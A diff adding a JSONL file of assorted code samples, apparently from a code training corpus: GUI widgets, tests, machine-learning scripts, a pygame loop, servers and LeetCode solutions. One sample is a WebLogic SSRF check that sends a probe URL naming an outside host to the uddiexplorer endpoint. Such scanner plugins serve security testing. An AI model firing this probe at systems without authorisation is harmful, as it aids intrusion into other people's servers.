diff --git "a/3485.jsonl" "b/3485.jsonl" new file mode 100644--- /dev/null +++ "b/3485.jsonl" @@ -0,0 +1,739 @@ +{"seq_id":"139520845","text":"from PyQt5.QtCore import pyqtSignal, QObject, QEvent, Qt\nfrom PyQt5.QtWidgets import QLabel\n\n\ndef clickable(widget):\n \"\"\"Filter which monitors clicks on qlabels which are icons\"\"\"\n class Filter(QObject):\n\n clicked = pyqtSignal(tuple, QLabel)\n\n def eventFilter(self, obj, event):\n\n if obj == widget:\n if event.type() == QEvent.MouseButtonDblClick:\n if obj.rect().contains(event.pos()):\n self.clicked.emit((0, obj), obj)\n return True\n elif event.type() == QEvent.MouseButtonPress: # right button\n if event.button() == Qt.RightButton:\n self.clicked.emit((1, obj), obj)\n return True\n return False\n\n clicking_filter = Filter(widget)\n widget.installEventFilter(clicking_filter)\n return clicking_filter.clicked\n","sub_path":"album/clickable_images.py","file_name":"clickable_images.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"582418764","text":"from behave import *\nfrom modules.warehouse import Warehouse\nimport json\n\n@given('For warehouses, I am connected to \"{url}\"')\ndef step_impl(context, url):\n context.url = url\n\n@when('For warehouses, I request the URL \"{endpoint}\"')\ndef step_impl(context, endpoint):\n context.endpoint = endpoint\n\n@step('For warehouses, I provide an object \"{data}\"')\ndef step_impl(context, data):\n data = json.loads(data)\n context.warehouse = Warehouse(context.url, **data)\n\n@then('For warehouses, I get a \"{code}\" result on \"{operation}\"')\ndef step_impl(context, code, operation):\n code = int(code)\n warehouse = Warehouse(context.url)\n if operation in ('find', 'insert'):\n if not hasattr(context, 'warehouse'):\n return False\n else:\n warehouse = context.warehouse\n if operation == 'insert':\n assert warehouse.insert(context.endpoint, code)\n if operation == 'find':\n assert warehouse.find(context.endpoint, code)\n if operation == 'all':\n assert warehouse.all(context.endpoint, code)\n return False\n","sub_path":"tests/features/steps/warehouse.py","file_name":"warehouse.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"500304182","text":"import sys\r\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLineEdit, QFormLayout, QListWidget, QPushButton, QSystemTrayIcon, \\\r\n QLabel\r\nfrom PyQt5.QtGui import QIcon, QKeyEvent\r\nfrom PyQt5.QtCore import Qt\r\nimport configparser\r\nimport os\r\nimport re\r\n\r\n\r\nclass Form(QWidget):\r\n def __init__(self):\r\n super(Form, self).__init__()\r\n self.lst = []\r\n self.edit = QLineEdit()\r\n self.edit.setPlaceholderText(\"Search\")\r\n self.list = QListWidget()\r\n self.resetconfig = QPushButton(\"Reset Config To Default\")\r\n self.flabel = QLabel('Found: 0')\r\n\r\n layout = QFormLayout()\r\n layout.addWidget(self.edit)\r\n layout.addWidget(self.list)\r\n layout.addWidget(self.resetconfig)\r\n layout.addWidget(self.flabel)\r\n self.setLayout(layout)\r\n\r\n self.edit.returnPressed.connect(self.search)\r\n self.resetconfig.clicked.connect(self.parseconfig)\r\n\r\n def keyPressEvent(self, QKeyEvent):\r\n if QKeyEvent.key() == Qt.Key_Escape:\r\n self.list.clear()\r\n self.edit.clear()\r\n\r\n def search(self):\r\n self.lst = []\r\n path = self.readconfig()\r\n searchname = self.edit.text()\r\n\r\n files = os.scandir(path['path'])\r\n for i in files:\r\n if re.search(searchname, i.path, re.IGNORECASE):\r\n self.lst.append(i.path)\r\n self.list.addItems(self.lst)\r\n self.flabel.setText(\"Found: \" + str(self.list.count()))\r\n\r\n def parseconfig(self):\r\n config = configparser.ConfigParser()\r\n config['settings'] = {\r\n 'path': 'D:\\osu!\\Songs',\r\n 'width': '500',\r\n 'height': '500'\r\n }\r\n with open('settings.ini', 'w') as configfile:\r\n config.write(configfile)\r\n\r\n def readconfig(self):\r\n config = configparser.ConfigParser()\r\n config.read('settings.ini')\r\n path = config['settings']\r\n return path\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n form = Form()\r\n\r\n wh = form.readconfig()\r\n form.setGeometry(200, 200, int(wh['width']), int(wh['height']))\r\n form.setWindowTitle('Search')\r\n form.setWindowIcon(QIcon('icons/Search.png'))\r\n QSystemTrayIcon(QIcon('icons/Search.png'))\r\n\r\n form.show()\r\n app.exec_()\r\n","sub_path":"Main.pyw","file_name":"Main.pyw","file_ext":"pyw","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"86181429","text":"\"\"\"\n6.4.1 LSTMで評判分析\nEpoch 10/10\n5668/5668 [==============================] - 9s 2ms/step - loss: 0.0021 - acc: 0.9995 - val_loss: 0.0459 - val_acc: 0.9880\n1418/1418 [==============================] - 0s 281us/step\nTest score: 0.046, accuracy: 0.988\n1 1 i want to be here because i love harry potter , and i really want a place where people take it serious , but it is still so much fun .\n1 1 because i would like to make friends who like the same things i like , and i really like harry potter , so i thought that joining a community like this would be a good start .\n1 1 so as felicia 's mom is cleaning the table , felicia grabs my keys and we dash out like freakin mission impossible .\n0 0 brokeback mountain was boring .\n0 0 not because i hate harry potter , but because i am the type of person that likes it when the main character dies .\n\n\"\"\"\n# -*- coding: utf-8 -*-\nfrom __future__ import division, print_function\nimport collections\nimport os\n\nimport nltk\nimport numpy as np\nfrom keras.callbacks import TensorBoard\nfrom keras.layers import Activation, Dense, Dropout, Embedding, LSTM\nfrom keras.models import Sequential\nfrom keras.preprocessing import sequence\nfrom sklearn.model_selection import train_test_split\nimport codecs\n\n\nDATA_DIR = \"./data\"\nLOG_DIR = \"./logs\"\n\nMAX_FEATURES = 2000\nMAX_SENTENCE_LENGTH = 40\n\nEMBEDDING_SIZE = 128\nHIDDEN_LAYER_SIZE = 64\nBATCH_SIZE = 32\nNUM_EPOCHS = 10\n\n# Read training data and generate vocabulary\nmaxlen = 0\nword_freqs = collections.Counter()\n# \"\"\"\n# import collections\n\n# l = ['a', 'a', 'a', 'a', 'b', 'c', 'c']\n# c = collections.Counter(l)\n\n# print(c)\n# # Counter({'a': 4, 'c': 2, 'b': 1})\n\n# でも以下の使い方を見る限り、要は辞書を作ってればいいので\n# word_freqs={}でも動くのでは?←most_commonのメソッドを使いたかったため\n# \"\"\"\nnum_recs = 0 # サンプル数に対応\nwith codecs.open(os.path.join(DATA_DIR, \"umich-sentiment-train.txt\"), \"r\",\n 'utf-8') as ftrain:\n for line in ftrain:\n label, sentence = line.strip().split(\"\\t\")\n try:\n words = nltk.word_tokenize(sentence.lower())\n except LookupError:\n print(\"Englisth tokenize does not downloaded. So download it.\")\n nltk.download(\"punkt\")\n words = nltk.word_tokenize(sentence.lower())\n maxlen = max(maxlen, len(words))\n for word in words:\n word_freqs[word] += 1\n num_recs += 1\n\n# Get some information about our corpus\nprint(maxlen) # 42\nprint(len(word_freqs)) # 2313\n# 自分の環境では>>> print(len(word_freqs)) 2328だった\n\n# 1 is UNK, 0 is PAD\n# We take MAX_FEATURES-1 features to account for PAD\n# 語彙は2000+2(UNKとPAD)個しようするものとする\n# ?なんでlen(word_freqs)じゃだめなんだろう\nvocab_size = min(MAX_FEATURES, len(word_freqs)) + 2\n# 頻出なのから対応する固有の番号を割り振る\nword2index = {x[0]: i+2 for i, x in\n enumerate(word_freqs.most_common(MAX_FEATURES))}\nword2index[\"PAD\"] = 0\nword2index[\"UNK\"] = 1\nindex2word = {v: k for k, v in word2index.items()}\n\n# 今は文章の羅列であるこれを数字の羅列に変換する\n# convert sentences to sequences\nX = np.empty((num_recs, ), dtype=list)\ny = np.zeros((num_recs, ))\ni = 0\nwith codecs.open(os.path.join(DATA_DIR, \"umich-sentiment-train.txt\"),\n 'r', 'utf-8') as ftrain:\n for line in ftrain:\n label, sentence = line.strip().split(\"\\t\")\n words = nltk.word_tokenize(sentence.lower())\n seqs = []\n for word in words:\n # もし辞書に単語があったら、対応する数字に直して、なかったらUNKにする.\n if word in word2index:\n seqs.append(word2index[word])\n else:\n seqs.append(word2index[\"UNK\"])\n X[i] = seqs # i番目のサンプルの文章に対応する数字の配列を作成\n y[i] = int(label)\n i += 1\n\n# Pad the sequences (left padded with zeros)\n# 左側に0を埋める\nX = sequence.pad_sequences(X, maxlen=MAX_SENTENCE_LENGTH)\n\n# Split input into training and test\nXtrain, Xtest, ytrain, ytest = train_test_split(X, y, test_size=0.2,\n random_state=42)\nprint(Xtrain.shape, Xtest.shape, ytrain.shape, ytest.shape)\n\n# Build model\nmodel = Sequential()\n# ここでの入力テンソルのshapeは(None, MAX_SENTENCE_LENGTH, 1)\n# 第一次元はバッチサイズに対応、指定なしなのでNone\n# 第二次元は時系列方向の長さに対応\n# 第三次元はある時刻の入力の要素数に対応(今はある数字が入っているだけなので1)\n\n# 埋め込みword2vec?\nmodel.add(Embedding(vocab_size, EMBEDDING_SIZE,\n input_length=MAX_SENTENCE_LENGTH))\n# 分散表現を獲得したことで、第三次元が変化\n# 入力テンソルは (None, MAX_SENTENCE_LENGTH, EMBEDDING_SIZE)となる。\nmodel.add(Dropout(0.5))\nmodel.add(LSTM(HIDDEN_LAYER_SIZE, dropout=0.5, recurrent_dropout=0.5))\n# LSTMの出力サイズはreturn_sequence=Trueで(None, HIDDEN_LAYER_SIZE, MAX_SENTENCE_LENGTH)になる\n# Falseの場合は(None, HIDDEN_LAYER_SIZE)となる。デフォではこっち(今回もこっち)\nmodel.add(Dense(1))\nmodel.add(Activation(\"sigmoid\"))\n\nmodel.compile(loss=\"binary_crossentropy\", optimizer=\"adam\",\n metrics=[\"accuracy\"])\n\n\nif not os.path.exists(LOG_DIR):\n os.mkdir(LOG_DIR)\n\nhistory = model.fit(Xtrain, ytrain, batch_size=BATCH_SIZE,\n epochs=NUM_EPOCHS,\n callbacks=[TensorBoard(LOG_DIR)],\n validation_data=(Xtest, ytest))\n\n# evaluate\nscore, acc = model.evaluate(Xtest, ytest, batch_size=BATCH_SIZE)\nprint(\"Test score: {:.3f}, accuracy: {:.3f}\".format(score, acc))\n\nfor i in range(5):\n idx = np.random.randint(len(Xtest))\n xtest = Xtest[idx].reshape(1, 40)\n ylabel = ytest[idx]\n ypred = model.predict(xtest)[0][0]\n sent = \" \".join([index2word[x] for x in xtest[0].tolist() if x != 0])\n print(\"{:.0f}\\t{:.0f}\\t{}\".format(ypred, ylabel, sent))\n","sub_path":"ch06/umich_sentiment_lstm.py","file_name":"umich_sentiment_lstm.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"360065574","text":"import pygame, sys\nfrom pygame.locals import *\nfrom random import randint # Importar random\n\npygame.init()\nventana = pygame.display.set_mode((1000, 800))\npygame.display.set_caption(\"Hola Mundo\")\n\nMi_Imagen = pygame.image.load(\"Imagenes/12279747422081422452rg1024_Ufo_in_metalic_style.svg.hi.png\")\nposX, posY = 200, 100\nvelocidad = 2\nBlanco = (255, 255, 255)\nderecha = True\n\nwhile True:\n ventana.fill(Blanco)\n ventana.blit(Mi_Imagen, (posX, posY))\n for evento in pygame.event.get():\n if evento.type == QUIT:\n pygame.quit()\n sys.exit()\n\n if derecha == True:\n if posX < 800:\n posX += velocidad\n else:\n derecha == False\n else:\n if posX > 1:\n posX -= velocidad\n else:\n derecha == True\n\n pygame.display.update()\n","sub_path":"PygameTuto/Movimiento.py","file_name":"Movimiento.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"307966327","text":"# ilang - Inference Language\n# Stefano Pedemonte\n# Aalto University, School of Science, Helsinki\n# Oct 2013, Helsinki \n\n\nimport _thread as thread\nimport http.server as BaseHTTPServer\nimport socketserver as SocketServer\n\nhost = '0.0.0.0'\nport = 8080\n\ndef serve(host,port):\n handler = BaseHTTPServer.SimpleHTTPRequestHandler\n SocketServer.TCPServer.allow_reuse_address = True\n server = SocketServer.TCPServer((host, port), handler, bind_and_activate=False)\n server.allow_reuse_address=True\n try:\n server.server_bind()\n server.server_activate()\n print(\"serving at port:\" + str(port))\n server.serve_forever()\n except:\n server.server_close()\n\ndef run_webserver(background):\n try:\n if background:\n thread.start_new_thread(serve, (host,port))\n else:\n serve(host,port)\n except:\n print('server already running')\n\n\n","sub_path":"src/tomolab/tomolab/_removed/ilang/webgui/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"76568256","text":"'''\r\nCreated on Jan 2, 2010\r\n\r\n@author: gumuz\r\n'''\r\n\r\n\r\nCONNECTION_TYPES = [\"None\", \"STARTTLS\"]\r\nSIZES = {\"KB\":1024, \"MB\":1048576}\r\nPRESETS = [{\"domains\":[\"gmail.com\"],\r\n \"host_name\":\"smtp.gmail.com\",\r\n \"port\":587,\r\n \"max_size\":25,\r\n \"max_size_type\":\"MB\",\r\n \"use_auth\":True,\r\n \"security\":\"STARTTLS\"},\r\n {\"domains\":[\"hotmail.com\", \"live.com\"],\r\n \"host_name\":\"smtp.live.com\",\r\n \"port\":587,\r\n \"max_size\":10,\r\n \"max_size_type\":\"MB\",\r\n \"use_auth\":True,\r\n \"security\":\"STARTTLS\"}, ]\r\n\r\nclass KurirAccount(object):\r\n def __init__(self):\r\n self.from_address = \"\"\r\n self.host_name, self.port = \"\", 25\r\n self.max_size, self.max_size_type = 2, \"MB\"\r\n self.use_auth, self.security = False, \"None\"\r\n self.username, self.password = \"\", \"\"\r\n\r\n \r\n def get_max_size_bytes(self):\r\n return self.max_size * SIZES[self.max_size_type]\r\n max_size_bytes = property(get_max_size_bytes)\r\n","sub_path":"src/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"31929697","text":"import argparse\nimport os\nimport server.app\n\nfrom config import cfg\nfrom server.app import app\nfrom server.api.processor import SegmentationProcessor\nfrom utils import setup_logger\n\n\nparser = argparse.ArgumentParser(\n description='Run image segmentation server'\n)\n# Server settings\nparser.add_argument(\n '--host',\n type=str,\n default='0.0.0.0',\n help='Host address'\n)\nparser.add_argument(\n '--port',\n type=int,\n default=5050,\n help='Listening port'\n)\n# Processor settings\nparser.add_argument(\n '--gpu',\n default=0,\n type=int,\n help='Gpu id'\n)\nparser.add_argument(\n \"--cfg\",\n default=\"config/ade20k-resnet50dilated-ppm_deepsup.yaml\",\n metavar=\"FILE\",\n help=\"Path to config file\",\n type=str,\n)\nparser.add_argument(\n \"opts\",\n help=\"Modify config options using the command-line\",\n default=None,\n nargs=argparse.REMAINDER,\n)\n\n\ndef main():\n args = parser.parse_args()\n\n cfg.merge_from_file(args.cfg)\n cfg.merge_from_list(args.opts)\n\n cfg.RUNTIME.gpu = args.gpu\n\n logger = setup_logger(distributed_rank=0)\n logger.info(\"Loaded configuration file {}\".format(args.cfg))\n logger.info(\"Running with config:\\n{}\".format(cfg))\n\n cfg.MODEL.arch_encoder = cfg.MODEL.arch_encoder.lower()\n cfg.MODEL.arch_decoder = cfg.MODEL.arch_decoder.lower()\n\n # absolute paths of model weights\n cfg.MODEL.weights_encoder = os.path.join(\n cfg.DIR, 'encoder_' + cfg.TEST.checkpoint)\n cfg.MODEL.weights_decoder = os.path.join(\n cfg.DIR, 'decoder_' + cfg.TEST.checkpoint)\n\n assert os.path.exists(cfg.MODEL.weights_encoder) and \\\n os.path.exists(cfg.MODEL.weights_decoder), \"checkpoint does not exitst!\"\n\n server.app.processor = SegmentationProcessor(cfg)\n with server.app.processor:\n app.run(host=args.host, port=args.port)\n","sub_path":"server/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"78648198","text":"#!/usr/bin/env python\n# coding:utf-8\n\nfrom django.conf.urls import url, include\nfrom views import *\n\nurlpatterns = [\n url(r'^login/$', login),\n url(r'^index/$', index),\n url(r'^register/$', register),\n url(r'^host/$', host),\n]","sub_path":"mysite/hosts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"86492866","text":"import cv2 \r\nimport os\r\nimport numpy as np\r\n\r\npath = 'C:/Users/HS/Pictures/Image/'\r\n\r\nclass CompareIMG:\r\n def __init__(self):\r\n print('Start')\r\n pass\r\n \r\n def binIMG(self, img):\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n ret, dst = cv2.threshold(gray, 100, 255, cv2.THRESH_BINARY) \r\n \r\n if ret:\r\n return dst\r\n else:\r\n print(\"Failed read image!\")\r\n exit()\r\n \r\n def diffIMG(self, img1, img2):\r\n img1 = self.binIMG(img1)\r\n detector = cv2.ORB_create()\r\n kp1, desc1 = detector.detectAndCompute(img1, None)\r\n #print(len(desc1))\r\n while 1:\r\n ret, img = img2.read()\r\n \r\n if not ret:\r\n print(\"Failed open Video!\")\r\n break\r\n \r\n vid = self.binIMG(img)\r\n \r\n kp2, desc2 = detector.detectAndCompute(vid, None)\r\n matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\r\n matches = matcher.match(desc1, desc2)\r\n \r\n matches = sorted(matches, key=lambda x:x.distance)\r\n \r\n src_pts = np.float32([ kp1[m.queryIdx].pt for m in matches ])\r\n dst_pts = np.float32([ kp2[m.trainIdx].pt for m in matches ])\r\n \r\n mtrx, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)\r\n \r\n h,w = img1.shape[:2]\r\n \r\n pts = np.float32([ [[0,0]],[[0,h-1]],[[w-1,h-1]],[[w-1,0]] ])\r\n dst = cv2.perspectiveTransform(pts,mtrx)\r\n img = cv2.polylines(img,[np.int32(dst)],True,255,3, cv2.LINE_AA)\r\n \r\n cv2.imshow('Result', img)\r\n \r\n if cv2.waitKey(55) == 27:\r\n break\r\n \r\n print(\"End\")\r\n cv2.destroyAllWindows()\r\n \r\n def Run(self):\r\n #파일 경로\r\n filepath1 = path + 'n5.jpg' #찾고싶은대상\r\n filepath2 = path + 'n8.mp4' #비교 영상\r\n \r\n self.img1 = cv2.imread(filepath1) #찾고싶���대상\r\n self.img2 = cv2.VideoCapture(filepath2) #비교 영상\r\n \r\n if self.img1 is None or self.img2 is None:\r\n print('Image load failed!')\r\n os.sys.exit()\r\n \r\n self.diffIMG(self.img1, self.img2)\r\n\r\nif __name__ == '__main__':\r\n cpimg = CompareIMG()\r\n cpimg.Run()\r\n\r\n","sub_path":"Object_Tracking/특징점 매칭/Case1/Matching.py","file_name":"Matching.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"491143269","text":"\"\"\"\nhttps://leetcode.com/problems/binary-tree-maximum-path-sum\n\"\"\"\n\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n def maxPathSum(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n self.res = 0 - 2 ** 31\n\n\n def _helper(node):\n if not node:\n return 0\n\n sum_l, sum_r = max(0, _helper(node.left)), max(0, _helper(node.right))\n sum_n = node.val + sum_l + sum_r\n if sum_n > self.res:\n self.res = sum_n\n return node.val + max(sum_l, sum_r)\n\n _helper(root)\n return self.res\n\n\n def maxPathSum_2(self, root):\n self.res = 0 - 2 ** 31\n self.path = None\n\n def _helper(node):\n if not node:\n return 0, None\n sum_l, path_l = _helper(node.left)\n if sum_l <= 0:\n sum_l = 0\n path_l = None\n sum_r, path_r = _helper(node.right)\n if sum_r <= 0:\n sum_r = 0\n path_r = None\n sum_n = node.val + sum_l + sum_r\n if sum_n > self.res:\n self.res = sum_n\n self.path = TreeNode(node.val)\n self.path.left, self.path.right = path_l, path_r\n path_n = TreeNode(node.val)\n if sum_l > sum_r:\n path_n.left = path_l\n return node.val + sum_l, path_n\n else:\n path_n.right = path_r\n return node.val + sum_r, path_n\n\n _helper(root)\n return self.path\n\nroot = TreeNode(-5)\nn2 = TreeNode(-2)\nn3 = TreeNode(-3)\nn4 = TreeNode(-2)\nroot.left, root.right = n2, n3\nn2.left = n4\nprint(Solution().maxPathSum_2(root))\n\n\n","sub_path":"leetcode/facebook/binary-tree-maximum-path-sum.py","file_name":"binary-tree-maximum-path-sum.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"323449726","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = 'orleven'\n\nimport urllib.parse\nimport requests\nrequests.packages.urllib3.disable_warnings()\n\ndef get_script_info(data=None):\n script_info = {\n \"name\": \"weblogic ssrf\",\n \"info\": \"weblogic ssrf.\",\n \"level\": \"high\",\n \"type\": \"info\"\n }\n return script_info\n\ndef prove(data):\n data = init(data,'web')\n if data['base_url']:\n url = data['base_url']+'uddiexplorer/SearchPublicRegistries.jsp?operator=http://www.orleven.com/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search'\n try:\n res = requests.get(url, headers=data['headers'], verify=False, timeout=data['timeout'])\n if \"weblogic.uddi.client.structures.exception.XML_SoapException\" in res.text :\n data['flag'] = 1\n data['data'].append({\"page\": '/uddiexplorer/SearchPublicRegistries.jsp'})\n data['res'].append({\"info\": url, \"key\": \"/uddiexplorer/SearchPublicRegistries.jsp\"})\n except:\n pass\n return data\n","sub_path":"script/web/weblogic_ssrf.py","file_name":"weblogic_ssrf.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"135019391","text":"# Restaurant\n\n# in order to import from a subfolder need to touch a __init__.py file in that\n# folder.\n\nfrom classes.restaurant import *\n\nrestaurant = Restaurant(\"Yoshinoya\", \"Japanese\")\n\nprint (\"Name : \" + restaurant.restaurant_name)\nprint (\"Cuisine Type : \" + restaurant.cuisine_type)\n\nrestaurant.describe_restaturant()\nrestaurant.open_restaurant()\n","sub_path":"crash_course/ch_9_classes/9.1.py","file_name":"9.1.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"180815957","text":"from igraph import Graph, STRONG\n\n\ndef count(db, height_from, height_to):\n blocks = get_blocks(db, height_from, height_to)\n edges = get_edges_from_blocks(blocks)\n graph = get_graph_from_edges(edges)\n v_counts = get_separate_graphs_counts(graph)\n v_counts.sort(reverse=True)\n return v_counts\n\n\ndef get_blocks(db, height_from, height_to):\n blocks = []\n query = db.blocks.find({'height': {'$gte': height_from, '$lte': height_to}})\n for block in query:\n blocks.append(block)\n return blocks\n\n\ndef get_edges_from_blocks(blocks):\n edges = []\n for block in blocks:\n for tx in block['transactions']:\n for inpt in tx['inputs']:\n for inp_addr in inpt['addresses']:\n for outpt in tx['outputs']:\n for out_addr in outpt['addresses']:\n if None not in (inp_addr, out_addr):\n edges.append((\n inp_addr['address'],\n out_addr['address'],\n ))\n return edges\n\n\ndef get_graph_from_edges(edges):\n graph = Graph()\n for edge in edges:\n for vertex in edge:\n graph.add_vertex(name=vertex)\n graph.add_edge(edge[0], edge[1])\n return graph\n\n\ndef get_separate_graphs_counts(graph):\n v_counts = []\n for graph in graph.decompose(mode=STRONG):\n v_counts.append(graph.vcount())\n return v_counts\n","sub_path":"web-api/src/functions/count_separate_graphs.py","file_name":"count_separate_graphs.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"159020395","text":"from typing import List\n\nclass Solution:\n def sequentialDigits(self, low: int, high: int) -> List[int]:\n ret = []\n if self.verifySequence(low):\n ret.append(low)\n x = self.nextSequence(low)\n while x <= high:\n ret.append(x)\n x = self.nextSequence(x)\n if self.verifySequence(high) and high not in ret:\n ret.append(high)\n return ret\n \n def verifySequence(self, num):\n num_str = str(num)\n prev_digit = int(num_str[0])\n length = len(num_str)\n for n in range(1, length):\n next_digit = int(num_str[n])\n if prev_digit+1 != next_digit:\n return False\n prev_digit = next_digit\n return True\n \n def nextSequence(self, num):\n ret = 0\n num_str = str(num)\n digit = int(num_str[0])\n length = len(num_str)\n if length > 10:\n return float(\"inf\")\n if digit+length > 10:\n return self.nextSequence(1*(10**(length)))\n for n in range(length):\n ret = ret * 10 + digit\n digit += 1\n if ret <= num:\n return self.nextSequence(num+(1*(10**(length-1)))-int(num_str[1:]))\n return ret\n\n\nprint(Solution().sequentialDigits(100, 300))\nprint(Solution().sequentialDigits(1000, 13000))\nprint(Solution().sequentialDigits(10, 1000000000))\nprint(Solution().sequentialDigits(58, 155))\nprint(Solution().sequentialDigits(123, 123))\nprint(Solution().sequentialDigits(234, 2314))\nprint([234,345,456,567,678,789,1234])\n# print(Solution().nextSequence(100000000))\n# print(Solution().verifySequence(123456789))\n# print(Solution().verifySequence(123446789))\n","sub_path":"Daily Challenge/Sequential Digits.py","file_name":"Sequential Digits.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"360085175","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport random\nimport _thread\nimport time\n\nvisited = []\ndef get_links(thread_name, bs):\n print('Getting links in {}'.format(thread_name))\n links = bs.find('div', {'id':'bodyContent'}).find_all('a',\n href=re.compile('^(/wiki/)((?!:).)*$'))\n return [link for link in links if link not in visited]\n\n\n# Define uma função para a thread\ndef scrape_article(thread_name, path):\n html = urlopen('http://en.wikipedia.org{}'.format(path))\n time.sleep(5)\n bs = BeautifulSoup(html, 'html.parser')\n title = bs.find('h1').get_text()\n print('Scraping {} in thread {}'.format(title, thread_name))\n links = get_links(thread_name, bs)\n if len(links) > 0:\n newArticle = links[random.randint(0, len(links)-1)].attrs['href']\n print(newArticle)\n scrape_article(thread_name, newArticle)\n\n# Cria duas threads conforme definidas a seguir\ntry:\n _thread.start_new_thread(scrape_article, ('Thread 1', '/wiki/Kevin_Bacon',))\n _thread.start_new_thread(scrape_article, ('Thread 2', '/wiki/Monty_Python',))\nexcept:\n print('error: unable to start threads')\n\nwhile 1:\n pass\n","sub_path":"Capitulo16/testcrawlingthreads_v2.py","file_name":"testcrawlingthreads_v2.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"22634915","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:hua\n# !/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:hua\nimport requests\nimport json\nimport time\n# url = \"http://192.168.100.106:5000/sklearn\"\nurl = \"http://127.0.0.1:5000/LGRS/LGB\"\n# url = \"http://192.168.11.220:5000/sklearn\"\nstart_time = time.time()\ndata = {\n \"data\": [\n {\"filename\": \"420testdata.csv\"},\n {\"tab_list\":['住院天数', '年龄', '咳嗽', '流涕', '呼吸音粗', '性别'],\"vars_c\":['住院天数', '年龄'],\"vars_d\":['咳嗽', '流涕', '呼吸音粗'],\"target\":['性别']}\n # {\"vars_c\":['住院天数', '年龄']},\n # {\"vars_d\":['咳嗽', '流涕', '呼吸音粗']},\n # {\"target\":['性别']},\n # {\"testdata\":None},\n # {\"n_neighbors\":6}\n ]\n}\ndata = json.dumps(data, ensure_ascii=True)\nheaders = {'Content-Type': 'application/json'}\nresponse = requests.post(url, data, headers=headers)\n\ndata1 = response.content.decode(encoding=\"unicode-escape\")\n# data1 = response.content.decode(encoding=\"utf-8\")\n\n# 获取key为中文的返回值\n# data2 = json.loads(data1)\n# 提取第一个表的信息\n# data3 = data2[\"yy\"]\nprint(data1)\nend_time = time.time()\ntimes = end_time - start_time\nprint(times)\n","sub_path":"Ubuntu_code/Machine_Learning_test/KNN客户端.py","file_name":"KNN客户端.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"22067055","text":"# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport signal\nimport logging\n\nfrom tornado.ioloop import IOLoop\nfrom tornado.options import options, define, parse_command_line, parse_config_file\nfrom tornado.web import Application\n\nimport routing\nfrom assets import AssetsHandler\nfrom handlers.error import ErrorHandler\nfrom widgets import topbar\n\ndefine(\"port\", 8880)\ndefine(\"debug\", default=False, type=bool)\ndefine(\"auto_reload\", default=False, type=bool)\n\n\ndef local_file(*path):\n root = os.path.dirname(os.path.abspath(__file__))\n return os.path.join(root, *path)\n\ntry:\n parse_config_file(local_file(\"config\", \"server.conf\"))\nexcept IOError:\n logging.info(\"No specific config file loaded\")\n\nparse_command_line()\n\napp_settings = {\n \"debug\": options.debug,\n \"auto_reload\": options.auto_reload,\n \"ui_modules\": [topbar, ],\n \"static_handler_class\": AssetsHandler,\n \"static_url_prefix\": \"/static/\",\n \"static_path\": local_file(\"web\"),\n \"template_path\": local_file(\"templates\"),\n \"default_handler_class\": ErrorHandler,\n}\n\n\ndef signal_handler(signal_num, frame):\n IOLoop.instance().stop()\n logging.info(\"IO loop stoped\")\n\n\nif __name__ == '__main__':\n app = Application(routing.rules, **app_settings)\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n app.listen(options.port)\n logging.info(\"Listening port %s\", options.port)\n 